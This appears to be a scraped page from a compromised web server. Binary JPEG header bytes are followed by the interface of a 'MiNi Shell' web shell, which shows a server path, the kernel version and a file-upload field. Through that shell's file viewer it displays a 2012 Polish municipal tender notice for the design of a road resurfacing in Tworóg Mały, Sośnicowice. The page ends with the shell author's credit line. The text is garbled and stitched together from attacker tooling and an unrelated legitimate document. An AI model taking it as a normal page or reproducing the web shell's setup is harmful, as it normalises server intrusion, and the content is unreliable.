JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120425/133016-N-2012.html

<p class="kh_header"><b>Sośnicowice: Projekt przebudowy nawierzchni drogowej ul. Nowowiejskiej w Tworogu Małym</b><br>
<b>Numer ogłoszenia: 133016 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sośnicowice , Rynek 19, 44-153 Sośnicowice, woj. śląskie, tel. 032 2387191 w. 330, faks 032 2387550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sosnicowice.i-gmina.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt przebudowy nawierzchni drogowej ul. Nowowiejskiej w Tworogu Małym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego opisu przedmiotu zamówienia jest wykonanie dokumentacji projektowej (projektu budowlano - wykonawczego): przebudowy nawierzchni drogowej ulicy Nowowiejskiej w Tworogu Małym, polegające na wykonaniu dokumentacji projektowej wraz z pozwoleniem na budowę, przedmiaru, kosztorysu i tymczasowej organizacji ruchu.
Projekt powinien być opracowany zgodnie z warunkami wydanymi przez Urząd Miejski w Sośnicowicach wraz z uzgodnieniami, opiniami i pozwoleniami niezbędnymi  do  realizacji  zadania, w  tym :
-   warunki na zajęcie pasa drogowego,
-   ustalenie warunków na odprowadzenie wód ( kanalizacja deszczowa ),
-   projekt organizacji ruchu na czas budowy ( oraz docelowej organizacji ruchu - fakultatywnie)
-   aktualizacja mapy zasadniczej,
-   pozwolenie na budowę.
1. Elementy  zamawianej dokumentacji projektowej 
1/  Mapa do celów projektowych  (1egz. z klauzulą  dla Zamawiającego + egzemplarze dla potrzeb projektowania )  
2/  Badania geotechniczne i określenie warunków gruntowo-wodnych podłoża  gruntowego  ( 3 egz.)
3/  Wniosek o ustalenie lokalizacji inwestycji celu publicznego  ( 3 egz.)
4/  Wniosek o wydanie decyzji o środowiskowych uwarunkowaniach  ( 3 egz.)
5/  Raport oddziaływania przedsięwzięcia na środowisko ( fakultatywnie )  ( 5 egz.)                       
6/  Projekt budowlany  ( 5 egz.)
7/  Projekt wykonawczy ( 5 egz.)
8/  Przedmiar  robót  ( 5 egz.)
9/  Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót  ( 5 egz.)
10/  Projekt zmiany organizacji ruchu na czas budowy  ( 5 egz.),  oraz  Projekt  docelowej  organizacji    ruchu ( fakultatywnie )
11/  Operat wodnoprawny  ( 3 egz.)
12/  Informacja dotycząca bezpieczeństwa i ochrony zdrowia  ( 5 egz.) 
13/  Inwentaryzacja zadrzewienia kolidującego z rozwiązaniami projektowymi  
       i plan wyrębu  ( 3 egz.)
14/  Kosztorys inwestorski  ( 3 egz.)
15/  Pozwolenie na budowę.
 2. Założenia wyjściowe do  projektowania 
 2.1. kategoria drogi   -  gminna ( ul. Nowowiejska)
 2.2. klasa drogi   -  D

 2.3.  Zakres rozwiązań projektowych obejmuje :   
a/   przebudowę istniejącej nawierzchni szutrowej na nawierzchnię asfaltobetonową 
      wraz z odwodnieniem na odcinku od skrzyżowania z ulicą Polną do końca    
      skrzyżowania z ulicą Brzozową włącznie (ok. 170 mb), położonej w miejscowości 
      Tworóg Mały, której zakres i lokalizacja określone zostały w załączniku nr 2,
      Nawierzchnia asfaltobetonowa.
      Zamawiający wymaga by nakładka bitumiczna wykonana była bezszwowo.
b/   odwodnienie w/w odcinka drogi,
c/   zabezpieczenie i ewentualną przebudowę kolidujących urządzeń infrastruktury technicznej,
d/   wymagana  konstrukcja nawierzchni jezdni drogi gminnej  -  ( dla  podłoża  G1 ):

2.4. Projektowana przebudowa nawierzchni drogowej ulicy Nowowiejskiej w Tworogu Małym, zlokalizowana jest na działkach gminnych o numerach ewidencyjnych: 161 i 321/159, ark. 5, obręb Tworóg Mały.
2.5. Zamawiający dopuszcza możliwość częściowej rezygnacji z zakresu przedmiotu umowy w przypadku niemożliwości uzyskania zgód lub warunków od odpowiedniego Zarządcy danej drogi lub Przedsiębiorstwa Energetycznego.
2.6.  zabezpieczenie i ewentualną przebudowę kolidujących urządzeń infrastruktury technicznej.
3. Szczegółowe wymagania dla opracowań projektowych
3.1. Mapa do celów projektowania dróg. 
Mapa zasadnicza do celów projektowych dróg w skali 1:500 lub 1 :1000 powinna posiadać klauzulę właściwego ośrodka dokumentacji geodezyjnej oraz powinna spełniać wymagania  określone w ustawie [7] , ustawie [8]  i w ogólnych specyfikacjach technicznych  GG-00.00.00. - Wymagania ogólne [16.1]    
i GG-00.11.01 - Wykonanie mapy dla celów projektowania dróg [16.2].  Aktualizacja treści mapy zasadniczej dotyczy nakładek tematycznych S+U+W+E.
W razie braku mapy zasadniczej  lub braku mapy zasadniczej w odpowiedniej skali , należy  wykonać mapę  jednostkową  przyjętą  do  zasobów  geodezyjnych. 
3.2. Badania geotechniczne i określenie warunków gruntowo-wodnych podłoża gruntowego.
Badania  geotechniczne  należy  wykonać  zgodnie  z  załącznikiem  nr  4  do  [3]  oraz  [14].      
3.3  Wniosek o ustalenie lokalizacji inwestycji celu publicznego.
       Wniosek  należy  opracować  zgodnie  z  [11].
3.4.  Wniosek o wydanie decyzji o środowiskowych  uwarunkowaniach.
Wniosek  j.w. należy opracować zgodnie z  [13a]. Integralną część wniosku stanowi informacja               
o planowanym  przedsięwzięciu  opracowana  zgodnie  z  art. 49 ust. 3 [13a].
3.5.  Raport  o oddziaływaniu przedsięwzięcia na środowisko ( fakultatywnie ).
Konieczność wykonania raportu j.w. i jego zakres wyniknie  z procedury  dotyczącej postępowania w sprawie  oceny  oddziaływania  na  środowisko,  zgodnie  z  [13a].
3.6. Projekt  budowlany.
Projekt budowlany obejmuje swoim zakresem przebudowę nawierzchni drogowej ulicy Nowowiejskiej w Tworogu Małym, wraz z odwodnieniem, zabezpieczenie i ewentualną przebudowę kolidujących  urządzeń  infrastruktury  technicznej. pozwoleniem na budowę, przedmiarem, kosztorysem i tymczasową organizacją ruchu.
Szczegółowy zakres i forma projektu budowlanego powinna przede wszystkim spełniać wymagania określone w ustawie prawo budowlane [1] w tym w art. 34 ust.1, 2 i 3 oraz w rozporządzeniu [2] i  w  warunkach  technicznych  [3].
Projekt budowlany powinien zawierać : 
I. Projekt zagospodarowania terenu - zawartość musi być zgodna m.in. z treścią Rozdziału 3 rozporządzenia [2]  i  zawierać:
1.Część opisową - zawartość musi być m.in. zgodna z treścią § 8 ust. 2 rozporządzenia [2].
Treść  Części Opisowej  powinna  uwzględniać  także  poniższą  ramową  zawartość:
1.Przedmiot inwestycji.
2.Istniejący stan zagospodarowania terenu (opis w zakresie niezbędnym do uzupełnienie części rysunkowej). 
3.Istniejące  terenowe  uwarunkowania  realizacyjne. 
4.Projektowane zagospodarowanie terenu (w zakresie niezbędnym do uzupełnienia części rysunkowej). 
5.Projektowane obiekty i urządzenia budowlane. 
6.Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu  budowlanego. 
7.Opinie , stanowiska , uzgodnienia , pozwolenia i warunki. 
W tym punkcie należy zamieścić wykaz i kopie ( w razie potrzeby uwierzytelnione ) : stanowisk, uzgodnień, opinii, warunków i innych pism uzyskanych w trakcie  wykonywania opracowania.
Instytucje, które powinny wypowiedzieć się na temat wszystkich elementów   planowanej inwestycji ( w zakresie swoich kompetencji ) to : 
- zainteresowani  właściciele  lub  zarządcy : dróg , kolei , wód , urządzeń  infrastruktury technicznej i innych obiektów: w zakresie wydawania  warunków do budowy  zarządzanych przez nich obiektów oraz w zakresie uzgadniania odpowiednich rozwiązań projektowych , zapewnienia dostaw energii (w zależności od potrzeb) , odbioru  ścieków ( w zależności od potrzeb) , warunków  przyłączenia do sieci uzbrojenia terenu ,
- właściwe jednostki organizacyjne, w których kompetencji leży wydawanie opinii, uzgodnień i pozwoleń wymaganych  przepisami  szczególnymi ,  w tym  Zespół  Uzgadniania  Dokumentacji  Projektowych .
2. Część rysunkową -  zawartość  musi być  zgodna z treścią § 8 ust. 1 i 3 i § 9 i 10 rozporządzenia [2].
Projekt zagospodarowania terenu należy sporządzić  na mapie do celów projektowych zgodnie z  § 4 ust. 1 i ust. 2  ustawy  [8].
II. Projekt architektoniczno - budowlany  dla  wszystkich  projektowanych  obiektów - zawartość musi być  zgodna  m.in.  z  treścią  rozdziału  4  rozporządzenia  [2].                                                               
 Zgodnie  z  rozporządzeniem  [2]  projekt  architektoniczno - budowlany  zawiera :
1.Opis techniczny -  zawartość  musi  być  zgodna  z  treścią  § 11 ust. 2 rozporządzenia [2].      
W opisie technicznym obiektów budowlanych powinny być zamieszczane wyniki obliczeń konstrukcji obiektów  oraz  informacje  gdzie  jest  dostępny  komplet  obliczeń. 
2.Część rysunkową - rysunki wszystkich obiektów budowlanych powinny przede wszystkim spełniać wymagania  m.in. § 12 i § 13  rozporządzenia  [2]. 
Na  rysunkach  należy  zamieścić  w  razie  potrzeby  stosowne  dane do wytyczenia obiektów w  terenie.
Część rysunkowa powinna zawierać co najmniej poniższe rysunki : 
1. Dla obiektów drogowych
-    plan sytuacyjny (1:500 lub 1:1000),
-    przekroje normalne - charakterystyczne (1:50 lub 1:100),
-    przekroje podłużne (1:100/1000 lub 1:200/2000),
-    przekroje poprzeczne (1:100 lub 1:200) - niezbędne do ustalenia granic pasa drogowego i działek wymagających  wykupu.
2 . Dla innych obiektów
     -  w  zależności  od  potrzeb.
3.  Dla urządzenia ochrony środowiska
     -  w  zależności  od  potrzeb. 
4.  Dla infrastruktury technicznej związanej i nie związanej z drogą
     -  w  zależności  od  potrzeb.
Do projektu budowlanego należy dołączyć  oświadczenie projektanta oraz oświadczenie  sprawdzającego o sporządzeniu projektu budowlanego zgodnie z umową , obowiązującymi przepisami  techniczno - budowlanymi , normami , wytycznymi  oraz  zasadami  wiedzy  technicznej , i  że projekt jest  kompletny  z  punktu  widzenia  celu , któremu  ma  służyć .
3.7. Projekt wykonawczy.
Celem tego opracowania projektowego jest uzyskanie niezbędnych danych dla potrzeb wykonania, odbioru i rozliczenia robót budowlanych.
W skład projektu wykonawczego wchodzą m.in. następujące składniki obejmujące wszystkie planowane obiekty, instalacje i urządzenia:}
1. Opis  techniczny.
2. Część  rysunkowa.
3. Uzgodnienia  branżowe  elementów  sieci  uzbrojenia  w  rejonie  projektowanych  robót .
Do projektu wykonawczego należy także dołączyć oświadczenie projektanta oraz oświadczenie sprawdzającego o sporządzeniu dokumentacji  zgodnie z umową , obowiązującymi przepisami techniczno - budowlanymi  , normami , wytycznymi  oraz zasadami wiedzy technicznej , i że przedmiotowa  dokumentacja  jest  kompletna  z  punktu  widzenia  celu , któremu  ma  służyć .
3.8. Przedmiar  robót.
Przedmiar robót należy wykonać dla wszystkich branż i wszystkich robót objętych dokumentacją projektową zgodnie z § 6.1. , § 6.2. , § 7. , § 8.1. , § 8.2. , § 8.3. , § 9.1. , § 9.2. , § 10.1., § 10.2.   rozporządzenia [12] . 
W przedmiarze robót należy również uwzględnić opłaty za zajęcie pasa drogowego .
3.9. Szczegółowe specyfikacje techniczne wykonania i odbioru robót ( SSTWiOR ).
Specyfikacje techniczne wykonania i odbioru robót należy wykonać zgodnie z [12] . Powinny one zawierać  szczegółowe  wymagania  dla  wykonawcy  robót  w  zakresie: 
sprzętu, materiałów, transportu, wykonania robót, kontroli jakości robót, obmiarów  robót, odbiorów robót i podstaw płatności za roboty . Specyfikacje ponadto muszą  dotyczyć zakresu  robót objętych  dokumentacją  projektową  i  uwzględniać  warunki  techniczno  -  budowlane,  normy  i  przepisy.
3.10.Projekt zmiany organizacji ruchu na czas budowy  (oraz Projekt docelowej organizacji ruchu      - fakultatywnie).  
Projekt  organizacji ruchu należy wykonać zgodnie z [6] i uzyskać zatwierdzenie przez organ zarządzający ruchem.
3.11. Operat wodnoprawny. 
Operat wodnoprawny należy wykonać zgodnie z [9].
3.12. Informacja dotycząca bezpieczeństwa i ochrony zdrowia.
Powyższą informację należy opracować zgodnie z  [4]. 
3.13. Inwentaryzacja zadrzewienia kolidującego z rozwiązaniami projektowymi i plan wyrębu. Inwentaryzacja oraz plan wyrębu ma być załącznikiem do wniosku  o uzyskanie pozwolenia na wycinkę drzew i krzewów, który należy opracować zgodnie z [10].
3.14. Kosztorys Inwestorski
Kosztorys inwestorski powinien odpowiadać m.in. wymaganiom określonym w rozporządzeniu [5]. Kosztorys należy wykonać w programie kosztorysowania NORMA lub kompatybilnym.
3.15. Dokumentacja geodezyjna i kartograficzna związana z nabywaniem nieruchomości i z czasowym korzystaniem z nieruchomości.  
Dokumentacja j.w. powinna spełniać wymagania określone w ustawie [7] a także uwzględniać wymagania określone w ogólnych specyfikacjach technicznych GG-00.00.00. - Wymagania ogólne [16.1] , GG-00.21.03. - Opracowywanie dokumentacji geodezyjnej i kartograficznej związanej z nabywaniem nieruchomości pod pasy drogowe [16.3] i GG-00.21.04. - Opracowanie dokumentacji geodezyjnej i kartograficznej związanej z uregulowaniem stanu prawnego gruntów zajętych pod pasy drogowe w latach ubiegłych [16.4]
3.16. Dokumentacja  formalno-prawna  niezbędna  w  celu  nabycia  prawa  do  dysponowania nieruchomościami  na  cele  budowlane  i  nabycia  prawa  do  czasowego  korzystania z  nieruchomości.
Dokumentacja formalno-prawna j.w. powinna spełniać wymagania określone w ogólnych specyfikacjach technicznych GG-00.00.00. - Wymagania ogólne [16.1] i GG-00.21.05. - Opracowanie dokumentacji formalno-prawnej niezbędnej w celu nabywania nieruchomości pod pasy drogowe [16.5].</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy, którzy spełnia?ją wymagania opisane w art. 22 ust, 1 ustawy Prawo zamówień publicznych, w oparciu o przedłożone dokumenty
Sposób dokonania oceny spełnienia wymaganego warunku:
przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2).	Posiadają wiedzę i doświadczenie tj. wykażą, iż wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówienia odpowiadające swoim rodzajem i wartością prace projektowe stanowiącym przedmiot zamówienia tj. minimum jedno zamówienie, prac projektowych o porównywalnym charakterze i zakresie zamówienia
Sposób dokonania oceny spełnienia wymaganego warunku:
przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy polegającej na: 
a) zmniejszeniu zakresu robót,
b) zmiany terminu wykonania umowy  w przypadku wystąpienia okoliczności wydłużających procedurę realizacji zamówienia nie z winy Wykonawcy i brakiem możliwości jego realizacji w terminie określonym w SIWZ
c) innych zmianach niezależnych od stron umowy, których nie można było przewidzieć w chwili jej zawarcia, nie powodujących zwiększenia wielkości zakresu zamówienia,
Wprowadzenie powyższych zmian jest możliwie po spełnieniu następujących warunków:
a) zgodnego oświadczenia stron umowy,
b) zachowania formy pisemnej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://sosnicowice.i-gmina.pl/przetargi-w-2012-r.-<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Sośnicowice, ul. Rynek 19, 44-153 Sośnicowice, pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 10:00, miejsce: Urząd Miejski Sośnicowice, ul. Rynek 19, 44-153 Sośnicowice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com